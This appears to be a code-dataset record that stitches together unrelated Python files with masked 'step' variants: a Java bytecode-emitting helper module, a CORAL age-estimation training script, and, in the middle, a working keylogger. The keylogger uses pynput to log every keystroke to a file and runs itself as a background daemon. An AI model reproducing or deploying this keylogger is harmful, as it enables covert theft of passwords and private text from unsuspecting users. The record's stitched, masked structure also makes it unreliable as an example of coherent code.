"step-3": "<mask token>\n\n\nclass Init:\n <mask token>\n <mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-4": "<mask token>\n\n\nclass Init:\n\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKESPECIAL(self.classname,\n '<init>', args=self.args, returns='V'))\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-5": "from ...java import opcodes as JavaOpcodes\n\nfrom .primitives import ICONST_val\n\n\n##########################################################################\n# Common Java operations\n##########################################################################\n\nclass New:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW(self.classname),\n JavaOpcodes.DUP()\n )\n\n\nclass Init:\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKESPECIAL(\n self.classname,\n '<init>',\n args=self.args,\n returns='V'\n ),\n )\n\n\nclass Yield:\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.yield_point),\n JavaOpcodes.INVOKEVIRTUAL(\n 'org/python/types/Generator',\n 'yield',\n args=['Ljava/util/Map;', 'I'],\n returns='V'\n ),\n # \"yield\" by returning from the generator method.\n JavaOpcodes.ARETURN()\n )\n\n\n##########################################################################\n# Java types and their operations\n##########################################################################\n\nclass Array:\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.size),\n JavaOpcodes.ANEWARRAY(self.classname),\n )\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(\n JavaOpcodes.DUP(),\n ICONST_val(i),\n self.fill,\n JavaOpcodes.AASTORE(),\n )\n\n\nclass List:\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP(),\n )\n\n if self.size:\n context.add_opcodes(\n ICONST_val(self.size),\n Init('java/util/ArrayList', 'I')\n )\n else:\n context.add_opcodes(\n Init('java/util/ArrayList')\n )\n\n class add:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List',\n 'add',\n args=['Ljava/lang/Object;'],\n returns='Z'\n ),\n JavaOpcodes.POP(),\n )\n\n\nclass Map:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(),\n Init('java/util/HashMap')\n )\n\n class get:\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.key),\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'get',\n args=['Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n )\n )\n\n class put:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'put',\n args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n ),\n JavaOpcodes.POP()\n )\n\n class putAll:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'putAll',\n args=['Ljava/util/Map;'],\n returns='V'\n ),\n )\n\n\nclass Class:\n class forName:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC(\n 'java/lang/Class',\n 'forName',\n args=['Ljava/lang/String;'],\n returns='Ljava/lang/Class;'\n ),\n )\n\n\nclass THROW:\n # Raise an exception of given type with given arguments\n # 
Example:\n # THROW(\n # 'org/python/exceptions/AttributeError',\n # ['Ljava/lang/String;', JavaOpcodes.LDC_W(\"Invalid attribute\")],\n # )\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(\n New(self.exception_class),\n *self.exc_arg_values\n )\n context.add_opcodes(\n Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW(),\n )\n",
"step-ids": [
12,
15,
16,
18,
23
]
}
|
[
12,
15,
16,
18,
23
] |
from pynput.keyboard import Listener
import logging
import daemon

# Log every keystroke with a timestamp to a file while running as a daemon.
logging.basicConfig(format="%(asctime)s:%(message)s")
file_logger = logging.FileHandler("/home/user0308/logger.log", "a")
logger = logging.getLogger()
logger.addHandler(file_logger)
logger.setLevel(logging.DEBUG)


def press(key):
    # Callback invoked by pynput for every key press.
    logging.info(key)


def work():
    # Block on the keyboard listener until it stops.
    with Listener(on_press=press) as listener:
        listener.join()


# Keep the log file descriptor open across the daemonization fork.
with daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):
    work()
|
normal
|
{
"blob_id": "3dc2d9a5e37ce1f546c0478de5a0bb777238ad00",
"index": 4306,
"step-1": "<mask token>\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\n<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(format='%(asctime)s:%(message)s')\n<mask token>\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-3": "<mask token>\nlogging.basicConfig(format='%(asctime)s:%(message)s')\nfile_logger = logging.FileHandler('/home/user0308/logger.log', 'a')\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-4": "from pynput.keyboard import Listener\nimport logging\nimport daemon\nimport socket\nimport thread\nlogging.basicConfig(format='%(asctime)s:%(message)s')\nfile_logger = logging.FileHandler('/home/user0308/logger.log', 'a')\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-5": "from pynput.keyboard import Listener\nimport logging\nimport daemon\nimport socket\nimport thread\n\nlogging.basicConfig(format=\"%(asctime)s:%(message)s\")\nfile_logger = logging.FileHandler(\"/home/user0308/logger.log\", \"a\")\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\ndef work():\n\twith Listener(on_press = press) as listener:\n \tlistener.join()\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n\t\twork()\t\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
# https://github.com/Raschka-research-group/coral-cnn/tree/master/model-code/resnet34
from absl import flags, app
from Rank_consistent_model_fix import *
from Rank_consistent_model import *
from random import shuffle, random
import tensorflow as tf
import numpy as np
# import cv2
import os
import sys
import datetime
flags.DEFINE_string('img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')
flags.DEFINE_string('txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt', 'Text (with label information) directory')
flags.DEFINE_string('val_img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Validate image path')
flags.DEFINE_string('val_txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt', 'Validate text path')
flags.DEFINE_string("val_txt_path_2", "D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt", "Validataion text path")
flags.DEFINE_integer('img_size', 128, 'Image size')
flags.DEFINE_integer('ch', 3, 'Image channels')
flags.DEFINE_integer('batch_size', 256, 'Train Batch size')
flags.DEFINE_integer("val_batch_size", 128, "Validation Batch size")
flags.DEFINE_integer("val_batch_size_2", 128, "Validation2 batch size")
flags.DEFINE_integer('num_classes', 48, 'Number of classes')
flags.DEFINE_integer('epochs', 5000, 'Total epochs of training')
flags.DEFINE_float("lr", 5e-5, "Learning rate")
flags.DEFINE_string('weights', "/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5", '')
flags.DEFINE_bool('train', True, 'True or False')
flags.DEFINE_bool('pre_checkpoint', False, 'True or False')
flags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')
flags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')
flags.DEFINE_string("graphs", "", "")
flags.DEFINE_integer('n_test', 10000, 'Number of test images')
flags.DEFINE_string('test_txt', '', 'Test text(label) path')
flags.DEFINE_string('test_img', '', 'Test images path')
flags.DEFINE_string("output_loss_txt", "/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt", "")
FLAGS = flags.FLAGS
FLAGS(sys.argv)
optimizer = tf.keras.optimizers.Adam(FLAGS.lr, beta_1=0.9, beta_2=0.99)
def _func(filename, label):
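    # Training-time preprocessing: decode the JPEG, resize to (img_size - 8),
    # randomly mirror it, and shift the age label so 16 maps to class 0.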
image_string = tf.io.read_file(filename)
decode_image = tf.image.decode_jpeg(image_string, channels=3)
decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.
#decode_image = tf.image.random_crop(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8, 3])
if random() > 0.5:
decode_image = tf.image.flip_left_right(decode_image)
#decode_image = tf.image.per_image_standardization(decode_image)
label = label - 16
one_hot = tf.one_hot(label, FLAGS.num_classes)
return decode_image, one_hot, label
def val_func(name, label):
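    # Validation-time preprocessing: same decode/resize as training, no augmentation.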
image_string = tf.io.read_file(name)
decode_image = tf.image.decode_jpeg(image_string, channels=3)
decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.
#decode_image = tf.image.per_image_standardization(decode_image)
label = int(label) - 16
one_hot = tf.one_hot(label, FLAGS.num_classes)
return decode_image, one_hot
#@tf.function
def run_model(model, images):
logits, probs = model(images, training=True)
return logits, probs
@tf.function
def train_step(model, images, levels, imp):
with tf.GradientTape() as tape:
logits, probs = run_model(model, images)
#total_loss = (-tf.reduce_sum((tf.nn.log_softmax(logits, axis=2)[:,:,1]*levels + tf.nn.log_softmax(logits, axis=2)[:,:,0]*(1-levels))*imp, 1))
# total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + tf.math.log(1. - tf.nn.sigmoid(logits))*(1-levels))*imp, 1))
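        # CORAL loss: importance-weighted binary cross-entropy summed over the
        # num_classes - 1 threshold tasks, written with log-sigmoid terms for
        # numerical stability (log(1 - sigmoid(x)) == log_sigmoid(x) - x).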
total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + (tf.math.log_sigmoid(logits) - logits)*(1-levels))*imp, 1))
#total_loss = -tf.reduce_sum((tf.math.log(tf.nn.softmax(logits, 2)[:, :, 1] + 1e-7) * levels \
# + tf.math.log(tf.nn.softmax(logits, 2)[:, :, 0] + 1e-7) * (1 - levels)) * imp, 1)
total_loss = tf.reduce_mean(total_loss)
gradients = tape.gradient(total_loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
return total_loss
def task_importance_weights(data):
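    # Task importance weights: each threshold task t is weighted by
    # sqrt(max(#labels above t, #labels not above t)), normalized by the maximum.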
label = np.array(data).astype(np.float32)
num_examples = label.size
y = np.unique(label)
m = np.zeros(label.shape)
for i, t in enumerate(np.arange(np.min(y), np.max(y))):
m_k = np.max([label[label > t].size,
num_examples - label[label > t].size])
#print(m_k)
m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)
m[i] = tf.sqrt(m_k)
# m[i] = float(m_k)**(0.5)
max_ = np.max(m)
imp = tf.cast(m / max_, tf.float32)
#print(imp)
return imp
@tf.function
def test_MAE(model, images, labels):
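    # Predicted rank = number of threshold tasks with probability > 0.5;
    # compared against the rank recovered from the one-hot ground-truth label.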
logits, probs = model(images, training=False)
predict = probs > 0.5
predict = tf.cast(predict, tf.float32)
pre_age = tf.reduce_sum(predict, 1)
grd_age = tf.argmax(labels, 1) + 1
grd_age = tf.cast(grd_age, tf.float32)
AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))
return AE
def make_levels(labels):
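    # Extended binary labels ("levels"): a sample with ordinal label k becomes
    # k ones followed by (num_classes - 1 - k) zeros, one entry per threshold task.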
levels = []
for i in range(FLAGS.batch_size):
l = [1] * (labels[i].numpy()) + [0]*(FLAGS.num_classes - 1 - labels[i].numpy())
l = tf.cast(l, tf.float32)
levels.append(l)
return tf.convert_to_tensor(levels, tf.float32)
def main(argv=None):
# train_model = resnet_type1(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, 3), NUM_CLASSES=FLAGS.num_classes)
train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, FLAGS.ch), include_top=False,
batch_size=FLAGS.batch_size, weight_path=FLAGS.weights, weights='imagenet')
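    # Backbone: the imported ResNet34 graph with ImageNet weights and no classification top.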
regularizer = tf.keras.regularizers.l2(0.000005)
initializer = tf.keras.initializers.glorot_normal()
for layer in train_model.layers:
for attr in ['kernel_regularizer']:
if hasattr(layer, attr):
setattr(layer, attr, regularizer)
# for attr_ in ["kernel_initializer"]:
# if hasattr(layer, attr_):
# setattr(layer, attr_, initializer)
x = train_model.output
avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)
# avgpool = tf.reshape(avgpool, [avgpool.shape[0], -1])
# fc = tf.keras.layers.Dense(1, use_bias=False)(avgpool)
# logits = Linear(NUM_CLASSES - 1)(fc)
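    # CORAL output head: a bias-free Dense layer producing num_classes - 1 logits,
    # followed by the custom Linear layer from the Rank_consistent_model modules
    # (presumably the per-task bias terms of the CORAL formulation).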
logits = tf.keras.layers.Dense(FLAGS.num_classes-1, use_bias=False)(avgpool)
logits = Linear(FLAGS.num_classes - 1)(logits)
probs = tf.nn.sigmoid(logits)
train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits, probs])
train_model.summary()
#for m in train_model.layers:
# if isinstance(m, tf.keras.layers.Conv2D):
# a = m.output_mask
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, (2. / n)**.5)
# elif isinstance(m, tf.keras.layers.BatchNormalization):
# m.get_weights
# m.weight.data.fill_(1)
# m.bias.data.zero_()
if FLAGS.pre_checkpoint is True:
ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)
ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.pre_checkpoint_path, max_to_keep=5)
# if a checkpoint exists, restore the latest checkpoint.
if ckpt_manager.latest_checkpoint:
print(ckpt_manager.latest_checkpoint)
ckpt.restore(ckpt_manager.latest_checkpoint)
            print('Latest checkpoint restored!!')
if FLAGS.train == True:
data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0, usecols=0)
data_name = [FLAGS.img_path + data_name_ for data_name_ in data_name]
data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0, usecols=1)
imp = task_importance_weights(data_label-16)
imp = imp[0:FLAGS.num_classes-1]
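        # Keep one importance weight per threshold task (num_classes - 1 tasks).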
val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100', skiprows=0, usecols=[0, 1, 2, 3])
print(len(val_data_name))
WM_img, WM_age = [], []
WF_img, WF_age = [], []
BM_img, BM_age = [], []
BF_img, BF_age = [], []
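        # Split the validation list into four demographic groups
        # (white/black x male/female) so MAE can be reported per group.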
for i in range(len(val_data_name)):
if val_data_name[i][2] == "M" and val_data_name[i][3] == "W":
WM_img.append(FLAGS.val_img_path + val_data_name[i][0])
WM_age.append(val_data_name[i][1])
if val_data_name[i][2] == "F" and val_data_name[i][3] == "W":
WF_img.append(FLAGS.val_img_path + val_data_name[i][0])
WF_age.append(val_data_name[i][1])
if val_data_name[i][2] == "M" and val_data_name[i][3] == "B":
BM_img.append(FLAGS.val_img_path + val_data_name[i][0])
BM_age.append(val_data_name[i][1])
if val_data_name[i][2] == "F" and val_data_name[i][3] == "B":
BF_img.append(FLAGS.val_img_path + val_data_name[i][0])
BF_age.append(val_data_name[i][1])
print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))
WM_img, WM_age = np.array(WM_img), np.array(WM_age)
WF_img, WF_age = np.array(WF_img), np.array(WF_age)
BM_img, BM_age = np.array(BM_img), np.array(BM_age)
BF_img, BF_age = np.array(BF_img), np.array(BF_age)
all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age], [BF_img, BF_age]]
batch_idx = len(data_label) // FLAGS.batch_size
#current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
#train_log_dir = FLAGS.graphs + current_time + '/train'
#val_log_dir = FLAGS.graphs + current_time + '/val'
#train_summary_writer = tf.summary.create_file_writer(train_log_dir)
#val_summary_writer = tf.summary.create_file_writer(val_log_dir)
loss_f = open(FLAGS.output_loss_txt, "w")
count = 0
for epoch in range(FLAGS.epochs):
A = list(zip(data_name, data_label))
shuffle(A)
data_name, data_label = zip(*A)
data_name = np.array(data_name)
data_label = np.array(data_label)
data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))
data_generator = data_generator.shuffle(len(data_name))
data_generator = data_generator.map(_func)
data_generator = data_generator.batch(FLAGS.batch_size)
data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)
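            # Rebuild the tf.data pipeline each epoch over the freshly shuffled file list.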
it = iter(data_generator)
#imp = task_importance_weights(data_label)
#imp = imp[0:FLAGS.num_classes-1]
for step in range(batch_idx):
batch_images, batch_labels, age = next(it)
levels = make_levels(age)
total_loss = train_step(train_model, batch_images, levels, imp)
#with val_summary_writer.as_default():
# tf.summary.scalar(u'total loss', loss, step=count)
if count % 10 == 0:
#MAE = test_MAE(train_model, batch_images, batch_labels, levels)
print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, step + 1, batch_idx, total_loss))
if count % 100 == 0:
test_list = ["WM", "WF", "BM", "BF"]
for j in range(len(all_val_list)):
val_img, val_lab = all_val_list[j]
val_data_generator = tf.data.Dataset.from_tensor_slices((val_img, val_lab))
val_data_generator = val_data_generator.map(val_func)
val_data_generator = val_data_generator.batch(1)
val_data_generator = val_data_generator.prefetch(tf.data.experimental.AUTOTUNE)
val_idx = len(val_img) // 1
val_it = iter(val_data_generator)
AE = 0
for i in range(val_idx):
img, lab = next(val_it)
pre_age = test_MAE(train_model, img, lab)
AE += pre_age
print("MAE = {} ({})".format(AE / len(val_img), test_list[j]))
loss_f.write("Epochs: {}, step = {}".format(epoch, count))
loss_f.write(" --> ")
loss_f.write(test_list[j])
loss_f.write(": ")
loss_f.write(str(AE / len(val_img)))
loss_f.write(", ")
loss_f.write("\n")
loss_f.flush()
# print("==========")
# print("[2]MAE = {}".format(MAE))
# print("==========")
# model_dir = FLAGS.save_checkpoint
# folder_name = int((count + 1)/val_idx)
# folder_name_str = "%s/%s" % (model_dir, folder_name)
# if not os.path.isdir(folder_name_str):
# print("Make {} folder to save checkpoint".format(folder_name))
# os.makedirs(folder_name_str)
# ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)
# checkpoint_dir = folder_name_str + "/" + "CORAL_{}_steps.ckpt".format(count)
# ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_dir, 5)
# ckpt_manager.save()
# with val_summary_writer.as_default():
# tf.summary.scalar(u'[2]MAE', MAE, step=count)
count += 1
else:
data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0, usecols=0)
data_name = [FLAGS.test_img + data_name_ for data_name_ in data_name]
        # Ground-truth ages come from the same test list as the image names.
        data_label = np.loadtxt(FLAGS.test_txt, dtype=np.float32, skiprows=0, usecols=1)
data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))
data_generator = data_generator.shuffle(len(data_name))
data_generator = data_generator.map(_func)
data_generator = data_generator.batch(1)
data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)
MAE = 0
it = iter(data_generator)
for i in range(FLAGS.n_test):
image, labels, opp_labels = next(it)
_, probs = train_model(image, training=False)
predict = probs > 0.5
predict = tf.cast(predict, tf.float32)
pre_age = tf.reduce_sum(predict)
            # Recover the ground-truth rank the same way test_MAE does and compare
            # it with the predicted rank (count of tasks with probability > 0.5).
            grd_age = tf.cast(tf.argmax(labels, 1) + 1, tf.float32)
            MAE += tf.reduce_sum(tf.math.abs(grd_age - pre_age))
if i % 1000 == 0:
print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))
print('Total MAE = {}'.format(MAE / FLAGS.n_test))
if __name__ == '__main__':
app.run(main)
|
normal
|
{
"blob_id": "9ffe350ff9a568111620ef7dafef83d341f6f01e",
"index": 9409,
"step-1": "<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\n<mask token>\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if 